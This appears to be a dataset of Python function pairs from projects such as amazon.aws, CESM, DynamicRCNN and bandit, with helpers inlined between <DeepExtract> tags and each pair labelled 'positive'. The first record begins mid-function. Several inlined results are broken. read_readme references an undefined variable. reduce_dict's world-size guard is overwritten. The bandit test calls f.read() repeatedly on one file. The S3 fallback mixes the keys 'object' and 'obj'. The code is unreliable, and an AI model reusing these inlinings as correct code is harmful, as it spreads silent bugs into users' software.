module.fail_json(msg='Key %s with version id %s does not exist.' % (s3_vars['object'], s3_vars['version']))
module.fail_json(msg='Key %s does not exist.' % s3_vars['object'])
if s3_vars['dest'] and path_check(s3_vars['dest']) and (s3_vars['overwrite'] != 'always'):
if s3_vars['overwrite'] == 'never':
module.exit_json(msg='Local object already exists and overwrite is disabled.', changed=False)
if s3_vars['overwrite'] == 'different' and etag_compare(module, connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local and remote object are identical, ignoring. Use overwrite=always parameter to force.', changed=False)
if s3_vars['overwrite'] == 'latest' and is_local_object_latest(connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local object is latest, ignoring. Use overwrite=always parameter to force.', changed=False)
try:
<DeepExtract>
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['object'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection.download_file(s3_vars['bucket'], s3_vars['object'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['object'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
</DeepExtract>
except Sigv4Required:
<DeepExtract>
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'], VersionId=s3_vars['version'])
else:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['obj'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection_v4.download_file(s3_vars['bucket'], s3_vars['obj'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['obj'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
</DeepExtract>
module.exit_json(failed=False)
|
def s3_object_do_get(module, connection, connection_v4, s3_vars):
if module.params.get('sig_v4'):
connection = connection_v4
try:
if s3_vars['version']:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.head_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code('404'):
keyrtn = False
except is_boto3_error_code('403') as e:
if s3_vars['validate'] is True:
module.fail_json_aws(e, msg='Failed while looking up object (during key check) %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Failed while looking up object (during key check) %s.' % s3_vars['object'], e)
keyrtn = True
if not keyrtn:
if s3_vars['version']:
module.fail_json(msg='Key %s with version id %s does not exist.' % (s3_vars['object'], s3_vars['version']))
module.fail_json(msg='Key %s does not exist.' % s3_vars['object'])
if s3_vars['dest'] and path_check(s3_vars['dest']) and (s3_vars['overwrite'] != 'always'):
if s3_vars['overwrite'] == 'never':
module.exit_json(msg='Local object already exists and overwrite is disabled.', changed=False)
if s3_vars['overwrite'] == 'different' and etag_compare(module, connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local and remote object are identical, ignoring. Use overwrite=always parameter to force.', changed=False)
if s3_vars['overwrite'] == 'latest' and is_local_object_latest(connection, s3_vars['bucket'], s3_vars['object'], version=s3_vars['version'], local_file=s3_vars['dest']):
module.exit_json(msg='Local object is latest, ignoring. Use overwrite=always parameter to force.', changed=False)
try:
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'], VersionId=s3_vars['version'])
else:
connection.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['object'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['object'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['object'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection.download_file(s3_vars['bucket'], s3_vars['object'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['object'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
except Sigv4Required:
if module.check_mode:
module.exit_json(msg='GET operation skipped - running in check mode', changed=True)
try:
if s3_vars['version']:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'], VersionId=s3_vars['version'])
else:
connection_v4.get_object(aws_retry=True, Bucket=s3_vars['bucket'], Key=s3_vars['obj'])
except is_boto3_error_code(['404', '403']) as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except is_boto3_error_message('require AWS Signature Version 4'):
raise Sigv4Required()
except is_boto3_error_code('InvalidArgument') as e:
module.fail_json_aws(e, msg='Could not find the key %s.' % s3_vars['obj'])
except (botocore.exceptions.BotoCoreError, botocore.exceptions.ClientError) as e:
raise S3ObjectFailure('Could not find the key %s.' % s3_vars['obj'], e)
optional_kwargs = {'ExtraArgs': {'VersionId': s3_vars['version']}} if s3_vars['version'] else {}
for x in range(0, s3_vars['retries'] + 1):
try:
connection_v4.download_file(s3_vars['bucket'], s3_vars['obj'], s3_vars['dest'], aws_retry=True, **optional_kwargs)
module.exit_json(msg='GET operation complete', changed=True)
except (botocore.exceptions.ClientError, botocore.exceptions.BotoCoreError) as e:
if x >= s3_vars['retries']:
raise S3ObjectFailure('Failed while downloading %s.' % s3_vars['obj'], e)
except SSLError as e:
if x >= s3_vars['retries']:
module.fail_json_aws(e, msg='s3 download failed')
module.exit_json(failed=False)
|
amazon.aws
|
positive
|
def anonymize_code_str(_code_str):
<DeepExtract>
if not True:
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == '"':
inside = True
continue
if inside:
if _code_str[i] == '"':
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += '"'
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == "'":
inside = True
continue
if inside:
if _code_str[i] == "'":
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += "'"
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
</DeepExtract>
(toks, kinds) = c_tokenizer.tokenize(_code_str)
_code_tokenized_deepfix = []
anonymize_dict = defaultdict(list)
for (tok, kind) in zip(toks, kinds):
if kind == 'string':
_code_tokenized_deepfix.append('_<string>_')
anonymize_dict['string'].append(tok)
elif kind == 'number':
_code_tokenized_deepfix.append('_<number>_')
anonymize_dict['number'].append(tok)
elif kind == 'char':
_code_tokenized_deepfix.append('_<char>_')
anonymize_dict['char'].append(tok)
else:
_code_tokenized_deepfix.append(tok)
return (' '.join(_code_tokenized_deepfix), anonymize_dict)
|
def anonymize_code_str(_code_str):
if not True:
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == '"':
inside = True
continue
if inside:
if _code_str[i] == '"':
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += '"'
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
res = ''
temp_string = ''
inside = False
for i in range(len(_code_str)):
if not inside:
res += _code_str[i]
if _code_str[i] == "'":
inside = True
continue
if inside:
if _code_str[i] == "'":
inside = False
if len(temp_string) > 2 and temp_string[0] == ' ' and (temp_string[-1] == ' '):
res += temp_string[1:-1]
else:
res += temp_string
res += "'"
temp_string = ''
else:
temp_string += _code_str[i]
_code_str = res
(toks, kinds) = c_tokenizer.tokenize(_code_str)
_code_tokenized_deepfix = []
anonymize_dict = defaultdict(list)
for (tok, kind) in zip(toks, kinds):
if kind == 'string':
_code_tokenized_deepfix.append('_<string>_')
anonymize_dict['string'].append(tok)
elif kind == 'number':
_code_tokenized_deepfix.append('_<number>_')
anonymize_dict['number'].append(tok)
elif kind == 'char':
_code_tokenized_deepfix.append('_<char>_')
anonymize_dict['char'].append(tok)
else:
_code_tokenized_deepfix.append(tok)
return (' '.join(_code_tokenized_deepfix), anonymize_dict)
|
DrRepair
|
positive
|
def _ref_is_commit(self, ref):
"""Verify that a reference is a valid commit according to git.
This could be a tag, branch, sha1 id, HEAD and potentially others...
Note: values returned by git_showref_* and git_revparse are
shell return codes, which are zero for success, non-zero for
error!
"""
is_commit = False
<DeepExtract>
cmd = ['git', 'rev-parse', '--quiet', '--verify', '{0}^{1}'.format(ref, '{commit}')]
(status, git_output) = execute_subprocess(cmd, status_to_caller=True, output_to_caller=True)
git_output = git_output.strip()
(value, _) = (status, git_output)
</DeepExtract>
if value == 0:
is_commit = True
return is_commit
|
def _ref_is_commit(self, ref):
"""Verify that a reference is a valid commit according to git.
This could be a tag, branch, sha1 id, HEAD and potentially others...
Note: values returned by git_showref_* and git_revparse are
shell return codes, which are zero for success, non-zero for
error!
"""
is_commit = False
cmd = ['git', 'rev-parse', '--quiet', '--verify', '{0}^{1}'.format(ref, '{commit}')]
(status, git_output) = execute_subprocess(cmd, status_to_caller=True, output_to_caller=True)
git_output = git_output.strip()
(value, _) = (status, git_output)
if value == 0:
is_commit = True
return is_commit
|
CESM
|
positive
|
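A standalone sketch of the same commit check, assuming only the standard library and a git binary on PATH; execute_subprocess is replaced here by subprocess.run, so this is an illustration rather than CESM's helper:
import subprocess
def ref_is_commit(ref, cwd='.'):
    # git rev-parse --quiet --verify <ref>^{commit} exits 0 only if <ref>
    # resolves to a commit object (tag, branch, sha1 id, HEAD, ...).
    cmd = ['git', 'rev-parse', '--quiet', '--verify', '{0}^{{commit}}'.format(ref)]
    result = subprocess.run(cmd, cwd=cwd, capture_output=True, text=True)
    return result.returncode == 0
print(ref_is_commit('HEAD'))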
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
<DeepExtract>
if not dist.is_available():
world_size = 1
if not dist.is_initialized():
world_size = 1
world_size = dist.get_world_size()
</DeepExtract>
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.reduce(values, dst=0)
if dist.get_rank() == 0 and average:
values /= world_size
reduced_dict = {k: v for (k, v) in zip(names, values)}
return reduced_dict
|
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that process with rank
0 has the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
if not dist.is_available():
world_size = 1
if not dist.is_initialized():
world_size = 1
world_size = dist.get_world_size()
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.reduce(values, dst=0)
if dist.get_rank() == 0 and average:
values /= world_size
reduced_dict = {k: v for (k, v) in zip(names, values)}
return reduced_dict
|
DynamicRCNN
|
positive
|
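The core of reduce_dict is sorting the keys, stacking the values into one tensor, and dividing by the world size after the collective reduce; a local sketch of that stacking step (without torch.distributed, which needs an initialized process group, so the reduce itself is only described in a comment):
import torch
input_dict = {'loss_cls': torch.tensor(0.5), 'loss_box': torch.tensor(1.5)}
world_size = 2  # placeholder; normally dist.get_world_size()
names = sorted(input_dict.keys())
values = torch.stack([input_dict[k] for k in names], dim=0)
# In the real function, dist.reduce(values, dst=0) sums this tensor across
# ranks before rank 0 performs the division below.
values = values / world_size
reduced = dict(zip(names, values))
print(reduced)  # {'loss_box': tensor(0.7500), 'loss_cls': tensor(0.2500)}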
def read_readme(file_name):
source_path = os.path.dirname(os.path.realpath(__file__))
if os.path.basename(source_path) == 'tools':
source_path = os.path.dirname(source_path)
elif 'build/bdist' in source_path:
source_path = source_path[:source_path.find('build/bdist')]
absolut_file_name = os.path.join(source_path, file_name)
doc_path = os.path.join(source_path, 'doc', 'sphinx', 'source')
with open(absolut_file_name) as f:
lines = f.readlines()
<DeepExtract>
if included_rst_files is None:
included_rst_files = {}
text = ''
for line in lines:
if line.startswith('.. include::'):
include_file_name = line.split('::')[-1].strip()
if include_file_name not in included_rst_files:
with open(os.path.join(doc_path, include_file_name)) as f:
included_rst_files[include_file_name] = True
text += merge_include(f.readlines(), doc_path, included_rst_files)
else:
text += line
text = text
</DeepExtract>
return text
|
def read_readme(file_name):
source_path = os.path.dirname(os.path.realpath(__file__))
if os.path.basename(source_path) == 'tools':
source_path = os.path.dirname(source_path)
elif 'build/bdist' in source_path:
source_path = source_path[:source_path.find('build/bdist')]
absolut_file_name = os.path.join(source_path, file_name)
doc_path = os.path.join(source_path, 'doc', 'sphinx', 'source')
with open(absolut_file_name) as f:
lines = f.readlines()
if included_rst_files is None:
included_rst_files = {}
text = ''
for line in lines:
if line.startswith('.. include::'):
include_file_name = line.split('::')[-1].strip()
if include_file_name not in included_rst_files:
with open(os.path.join(doc_path, include_file_name)) as f:
included_rst_files[include_file_name] = True
text += merge_include(f.readlines(), doc_path, included_rst_files)
else:
text += line
text = text
return text
|
CodeReview
|
positive
|
def fill_symmetric_const_space(area: int, sp_max: int, n_min: int, n_max: int) -> List[Tuple[int, int]]:
"""Fill the given 1-D area given maximum space spec alone.
The method draws the minimum number of fill blocks needed to satisfy maximum spacing spec.
The given area is filled with the following properties:
1. all spaces are as close to the given space as possible (differ by at most 1),
without exceeding it.
2. the filled area is as uniform as possible.
3. the filled area is symmetric about the center.
4. fill is drawn as much as possible given the above constraints.
fill is drawn such that space blocks abut both area boundaries.
Parameters
----------
area : int
the 1-D area to fill.
sp_max : int
the maximum space.
n_min : int
minimum fill length.
n_max : int
maximum fill length
Returns
-------
fill_intv : List[Tuple[int, int]]
list of fill intervals.
"""
if n_min > n_max:
raise ValueError('min fill length = %d > %d = max fill length' % (n_min, n_max))
num_fill = -(-(area - sp_max) // (n_max + sp_max))
if num_fill == 0:
return []
blk_len = (area - (num_fill + 1) * sp_max) // num_fill
if blk_len >= n_min:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
(sp_max, remainder) = divmod(area - num_fill * n_min, num_fill + 1)
if n_max > n_min or remainder == 0:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
<DeepExtract>
fill_info = _fill_symmetric_info(area, num_fill + 1, n_max, inc_sp=False, fill_on_edge=True, cyclic=False)
fill_info.invert = True
(sol, num_diff_sp) = fill_symmetric_interval(fill_info)
</DeepExtract>
if num_diff_sp == 0:
return sol
return fill_symmetric_helper(area, num_fill + 2, n_max, inc_sp=False, invert=True, fill_on_edge=True, cyclic=False)
|
def fill_symmetric_const_space(area: int, sp_max: int, n_min: int, n_max: int) -> List[Tuple[int, int]]:
"""Fill the given 1-D area given maximum space spec alone.
The method draws the minimum number of fill blocks needed to satisfy maximum spacing spec.
The given area is filled with the following properties:
1. all spaces are as close to the given space as possible (differ by at most 1),
without exceeding it.
2. the filled area is as uniform as possible.
3. the filled area is symmetric about the center.
4. fill is drawn as much as possible given the above constraints.
fill is drawn such that space blocks abut both area boundaries.
Parameters
----------
area : int
the 1-D area to fill.
sp_max : int
the maximum space.
n_min : int
minimum fill length.
n_max : int
maximum fill length
Returns
-------
fill_intv : List[Tuple[int, int]]
list of fill intervals.
"""
if n_min > n_max:
raise ValueError('min fill length = %d > %d = max fill length' % (n_min, n_max))
num_fill = -(-(area - sp_max) // (n_max + sp_max))
if num_fill == 0:
return []
blk_len = (area - (num_fill + 1) * sp_max) // num_fill
if blk_len >= n_min:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
(sp_max, remainder) = divmod(area - num_fill * n_min, num_fill + 1)
if n_max > n_min or remainder == 0:
return fill_symmetric_helper(area, num_fill, sp_max, inc_sp=False, invert=False, fill_on_edge=False, cyclic=False)
fill_info = _fill_symmetric_info(area, num_fill + 1, n_max, inc_sp=False, fill_on_edge=True, cyclic=False)
fill_info.invert = True
(sol, num_diff_sp) = fill_symmetric_interval(fill_info)
if num_diff_sp == 0:
return sol
return fill_symmetric_helper(area, num_fill + 2, n_max, inc_sp=False, invert=True, fill_on_edge=True, cyclic=False)
|
bag
|
positive
|
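The -(-(area - sp_max) // (n_max + sp_max)) expression above is the usual integer ceiling-division trick; a tiny worked example (standalone, not part of the bag code):
def ceil_div(a, b):
    # Equivalent to math.ceil(a / b) for positive b, using only integer arithmetic.
    return -(-a // b)
print(ceil_div(7, 3))   # 3
print(ceil_div(6, 3))   # 2
print(ceil_div(10, 4))  # 3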
def NLCore_avg(model, in_blob1, in_blob2, in_dim1, in_dim2, latent_dim, num_feat1, num_feat2, prefix, test_mode):
"""Core logic of non-local blocks."""
g = model.ConvNd(in_blob2, prefix + '_g', in_dim2, latent_dim, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params1)
blob_out = model.ReduceMean(g, prefix + '_y', axes=[2])
(blob_out, _) = model.Reshape(blob_out, [blob_out + '_5d', blob_out + '_shape5d'], shape=(-1, latent_dim, 1, 1, 1))
if cfg.FBO_NL.PRE_ACT:
<DeepExtract>
if cfg.FBO_NL.PRE_ACT_LN:
blob_out = model.LayerNorm(blob_out, [blob_out + '_ln', blob_out + '_ln_mean', blob_out + '_ln_std'])[0]
blob_out = model.Relu(blob_out, blob_out + '_relu')
</DeepExtract>
if cfg.FBO_NL.NL_avg_TRANS_OUT:
blob_out = model.ConvNd(blob_out, prefix + '_out', latent_dim, in_dim1, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params2)
if not cfg.FBO_NL.PRE_ACT:
blob_out = model.LayerNorm(blob_out, [prefix + '_ln', prefix + '_ln_mean', prefix + '_ln_std'])[0]
if cfg.FBO_NL.LFB_DROPOUT_ON and (not test_mode):
blob_out = model.Dropout(blob_out, blob_out + '_drop', ratio=cfg.FBO_NL.DROPOUT_RATE, is_test=False)
return blob_out
|
def NLCore_avg(model, in_blob1, in_blob2, in_dim1, in_dim2, latent_dim, num_feat1, num_feat2, prefix, test_mode):
"""Core logic of non-local blocks."""
g = model.ConvNd(in_blob2, prefix + '_g', in_dim2, latent_dim, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params1)
blob_out = model.ReduceMean(g, prefix + '_y', axes=[2])
(blob_out, _) = model.Reshape(blob_out, [blob_out + '_5d', blob_out + '_shape5d'], shape=(-1, latent_dim, 1, 1, 1))
if cfg.FBO_NL.PRE_ACT:
if cfg.FBO_NL.PRE_ACT_LN:
blob_out = model.LayerNorm(blob_out, [blob_out + '_ln', blob_out + '_ln_mean', blob_out + '_ln_std'])[0]
blob_out = model.Relu(blob_out, blob_out + '_relu')
if cfg.FBO_NL.NL_avg_TRANS_OUT:
blob_out = model.ConvNd(blob_out, prefix + '_out', latent_dim, in_dim1, [1, 1, 1], strides=[1, 1, 1], pads=[0, 0, 0] * 2, **init_params2)
if not cfg.FBO_NL.PRE_ACT:
blob_out = model.LayerNorm(blob_out, [prefix + '_ln', prefix + '_ln_mean', prefix + '_ln_std'])[0]
if cfg.FBO_NL.LFB_DROPOUT_ON and (not test_mode):
blob_out = model.Dropout(blob_out, blob_out + '_drop', ratio=cfg.FBO_NL.DROPOUT_RATE, is_test=False)
return blob_out
|
CRCNN-Action
|
positive
|
def execute_transaction(self, txn):
if 'contract' in txn.__dict__:
sid = (txn.sid, txn.contract)
else:
sid = txn.sid
position = self.positions[sid]
position.update(txn)
<DeepExtract>
try:
_ = self._position_amounts[sid]
_ = self._position_last_sale_prices[sid]
except (KeyError, IndexError):
self._position_amounts = self._position_amounts.append(pd.Series({sid: 0.0}))
self._position_last_sale_prices = self._position_last_sale_prices.append(pd.Series({sid: 0.0}))
</DeepExtract>
self._position_amounts[sid] = position.amount
transaction_cost = txn.price * txn.amount
self.cumulative_capital_used += transaction_cost
self.cash_adjustment -= txn.price * txn.amount * get_multiplier(sid)
if math.fabs(self.cumulative_capital_used) > self.max_capital_used:
self.max_capital_used = math.fabs(self.cumulative_capital_used)
<DeepExtract>
self.max_capital_used = int(5000 * round(float(self.max_capital_used) / 5000))
</DeepExtract>
self.max_leverage = 1.1 * self.max_capital_used / self.starting_mav
if self.keep_transactions:
self.processed_transactions[txn.dt].append(txn)
|
def execute_transaction(self, txn):
if 'contract' in txn.__dict__:
sid = (txn.sid, txn.contract)
else:
sid = txn.sid
position = self.positions[sid]
position.update(txn)
try:
_ = self._position_amounts[sid]
_ = self._position_last_sale_prices[sid]
except (KeyError, IndexError):
self._position_amounts = self._position_amounts.append(pd.Series({sid: 0.0}))
self._position_last_sale_prices = self._position_last_sale_prices.append(pd.Series({sid: 0.0}))
self._position_amounts[sid] = position.amount
transaction_cost = txn.price * txn.amount
self.cumulative_capital_used += transaction_cost
self.cash_adjustment -= txn.price * txn.amount * get_multiplier(sid)
if math.fabs(self.cumulative_capital_used) > self.max_capital_used:
self.max_capital_used = math.fabs(self.cumulative_capital_used)
self.max_capital_used = int(5000 * round(float(self.max_capital_used) / 5000))
self.max_leverage = 1.1 * self.max_capital_used / self.starting_mav
if self.keep_transactions:
self.processed_transactions[txn.dt].append(txn)
|
AlephNull
|
positive
|
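The int(5000 * round(float(x) / 5000)) line above rounds capital usage to the nearest multiple of 5000; a couple of worked values in a standalone helper (illustrative only):
def round_to_nearest(x, step=5000):
    # Round x to the nearest multiple of step.
    return int(step * round(float(x) / step))
print(round_to_nearest(7321))   # 5000
print(round_to_nearest(12600))  # 15000
print(round_to_nearest(2499))   # 0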
def im_detect_keypoints(model, im_scale, boxes, blob_conv):
"""Infer instance keypoint poses. This function must be called after
im_detect_bbox as it assumes that the Caffe2 workspace is already populated
with the necessary blobs.
Arguments:
model (DetectionModelHelper): the detection model to use
im_scale (list): image blob scales as returned by im_detect_bbox
boxes (ndarray): R x 4 array of bounding box detections (e.g., as
returned by im_detect_bbox)
Returns:
pred_heatmaps (ndarray): R x J x M x M array of keypoint location
logits (softmax inputs) for each of the J keypoint types output
by the network (must be processed by keypoint_results to convert
into point predictions in the original image coordinate space)
"""
M = cfg.KRCNN.HEATMAP_SIZE
if boxes.shape[0] == 0:
pred_heatmaps = np.zeros((0, cfg.KRCNN.NUM_KEYPOINTS, M, M), np.float32)
return pred_heatmaps
inputs = {'keypoint_rois': _get_rois_blob(boxes, im_scale)}
if cfg.FPN.MULTILEVEL_ROIS:
<DeepExtract>
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(inputs['keypoint_rois'][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(inputs, 'keypoint_rois', inputs['keypoint_rois'], lvls, lvl_min, lvl_max)
</DeepExtract>
pred_heatmaps = model.module.keypoint_net(blob_conv, inputs)
pred_heatmaps = pred_heatmaps.data.cpu().numpy().squeeze()
if pred_heatmaps.ndim == 3:
pred_heatmaps = np.expand_dims(pred_heatmaps, axis=0)
return pred_heatmaps
|
def im_detect_keypoints(model, im_scale, boxes, blob_conv):
"""Infer instance keypoint poses. This function must be called after
im_detect_bbox as it assumes that the Caffe2 workspace is already populated
with the necessary blobs.
Arguments:
model (DetectionModelHelper): the detection model to use
im_scale (list): image blob scales as returned by im_detect_bbox
boxes (ndarray): R x 4 array of bounding box detections (e.g., as
returned by im_detect_bbox)
Returns:
pred_heatmaps (ndarray): R x J x M x M array of keypoint location
logits (softmax inputs) for each of the J keypoint types output
by the network (must be processed by keypoint_results to convert
into point predictions in the original image coordinate space)
"""
M = cfg.KRCNN.HEATMAP_SIZE
if boxes.shape[0] == 0:
pred_heatmaps = np.zeros((0, cfg.KRCNN.NUM_KEYPOINTS, M, M), np.float32)
return pred_heatmaps
inputs = {'keypoint_rois': _get_rois_blob(boxes, im_scale)}
if cfg.FPN.MULTILEVEL_ROIS:
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn_utils.map_rois_to_fpn_levels(inputs['keypoint_rois'][:, 1:5], lvl_min, lvl_max)
fpn_utils.add_multilevel_roi_blobs(inputs, 'keypoint_rois', inputs['keypoint_rois'], lvls, lvl_min, lvl_max)
pred_heatmaps = model.module.keypoint_net(blob_conv, inputs)
pred_heatmaps = pred_heatmaps.data.cpu().numpy().squeeze()
if pred_heatmaps.ndim == 3:
pred_heatmaps = np.expand_dims(pred_heatmaps, axis=0)
return pred_heatmaps
|
detectron-self-train
|
positive
|
def test_report(self):
with open(self.tmp_fname, 'wb') as tmp_file:
b_xml.report(self.manager, tmp_file, self.issue.severity, self.issue.confidence)
with open(self.tmp_fname) as f:
<DeepExtract>
d = {ET.XML(f.read()).tag: {} if ET.XML(f.read()).attrib else None}
children = list(ET.XML(f.read()))
if children:
dd = collections.defaultdict(list)
for dc in map(self._xml_to_dict, children):
for (k, v) in dc.items():
dd[k].append(v)
d = {ET.XML(f.read()).tag: {k: v[0] if len(v) == 1 else v for (k, v) in dd.items()}}
if ET.XML(f.read()).attrib:
d[ET.XML(f.read()).tag].update((('@' + k, v) for (k, v) in ET.XML(f.read()).attrib.items()))
if ET.XML(f.read()).text:
text = ET.XML(f.read()).text.strip()
if children or ET.XML(f.read()).attrib:
if text:
d[ET.XML(f.read()).tag]['#text'] = text
else:
d[ET.XML(f.read()).tag] = text
data = d
</DeepExtract>
self.assertEqual(self.tmp_fname, data['testsuite']['testcase']['@classname'])
self.assertEqual(self.issue.text, data['testsuite']['testcase']['error']['@message'])
self.assertEqual(self.check_name, data['testsuite']['testcase']['@name'])
self.assertIsNotNone(data['testsuite']['testcase']['error']['@more_info'])
|
def test_report(self):
with open(self.tmp_fname, 'wb') as tmp_file:
b_xml.report(self.manager, tmp_file, self.issue.severity, self.issue.confidence)
with open(self.tmp_fname) as f:
d = {ET.XML(f.read()).tag: {} if ET.XML(f.read()).attrib else None}
children = list(ET.XML(f.read()))
if children:
dd = collections.defaultdict(list)
for dc in map(self._xml_to_dict, children):
for (k, v) in dc.items():
dd[k].append(v)
d = {ET.XML(f.read()).tag: {k: v[0] if len(v) == 1 else v for (k, v) in dd.items()}}
if ET.XML(f.read()).attrib:
d[ET.XML(f.read()).tag].update((('@' + k, v) for (k, v) in ET.XML(f.read()).attrib.items()))
if ET.XML(f.read()).text:
text = ET.XML(f.read()).text.strip()
if children or ET.XML(f.read()).attrib:
if text:
d[ET.XML(f.read()).tag]['#text'] = text
else:
d[ET.XML(f.read()).tag] = text
data = d
self.assertEqual(self.tmp_fname, data['testsuite']['testcase']['@classname'])
self.assertEqual(self.issue.text, data['testsuite']['testcase']['error']['@message'])
self.assertEqual(self.check_name, data['testsuite']['testcase']['@name'])
self.assertIsNotNone(data['testsuite']['testcase']['error']['@more_info'])
|
bandit
|
positive
|
